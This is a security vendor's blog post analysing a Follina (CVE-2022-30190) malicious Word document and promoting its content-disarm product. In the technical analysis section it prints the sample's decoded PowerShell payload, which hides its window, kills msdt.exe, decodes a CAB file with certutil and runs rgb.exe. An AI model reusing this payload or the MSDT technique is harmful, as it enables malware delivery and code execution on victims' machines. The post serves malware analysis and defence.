Follina (CVE-2022–30190) is a Microsoft Office zero-day vulnerability discovered in May 2022. First mentioned in this tweet.

This vulnerability uses Microsoft Windows Support Diagnostic Tool (MSDT) to gain remote code execution. Attackers used this to inject malicious external links to an OLE object inside Word Document. This is a simple yet effective phishing attack.

In this blog, we will analyze the Follina Malware sample and use our CDR module to defeat the attack.

Technical Analysis

Follina zero-day was first seen in the wild with this Microsoft Word Document

This attack is all about tricking the victim to click and open the malformed document. Although, security researcher Kevin Beaumont says “if you change the document to RTF form, it runs without even opening the document”.

Document contains an external link to malicious HTML reference in its relationship file.

When victim clicks on the document, it starts connecting to the external web link:

Javascript code contains Base64-encoded payload. Powershell script reveals after decoding the payload.

$cmd = “c:\windows\system32\cmd.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c taskkill /f /im msdt.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c cd C:\users\public\&&for /r %temp% %i in (05–2022–0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe”;

Powershell code follows these steps:

• Starts with hidden window to:
• Kill msdt.exe if it is running
• Loop through files inside “05–2022–0438.rar” file and copy it’s contentsto C:\Users\public and renames it as “1.rar”
• Search the Base64 encoded CAB file (MSCF header) inside the “1.rar” fileand saves it as “1.t”
• Decode 1.t to be saved as 1.c
• Expands “1.c” and executes the file “rgb.exe”

As we see payload uses the “ms-msdt” scheme to execute PowerShell code. MSDT is a support tool but it allows code execution even if macros are disabled.

After the publication of Follina, Microsoft advised users to disable the MSDT URL Protocol but this can be too late.

No matter how much you try to raise awareness of employees against phishing attacks, you cannot eliminate the human factor. Hence, as ThreatZone we protect you from known and unknown threats like Follina zero-day before attack execution. We provide you with our CDR(Content Disarm and Reconstruction) module to defeat the attacks.

Sanitize Maldoc with Threat Zone CDR

As we see in the below image CDR module sanitized oleObject relationship from the malicious document.

After the sanitization, document no longer contains malicious external link to the HTML file. Even if the victim opens the document, they will not deal with any malware. Threat Zone CDR gives to user threat-safe document while preserving file’s integrity.

Scanning the sanitized file with Virustotal shows that the document is safe.

So, as you can see, antivirus can fail to provide adequate security. CDR doesn’t rely on detection.

It is essential to use CDR solution when a zero-day or unknown threats occur, as antiviruses may fail to detect newly emerging attack vectors.

Threat Zone CDR allows you to receive threat-safe, ready to use file in less than a second.

References

• https://twitter.com/nao_sec/status/1530196847679401984
• https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e

Thanks for reading!

Article by Nur Pabuccu

Linkedin : https://www.linkedin.com/in/nurpabuccu/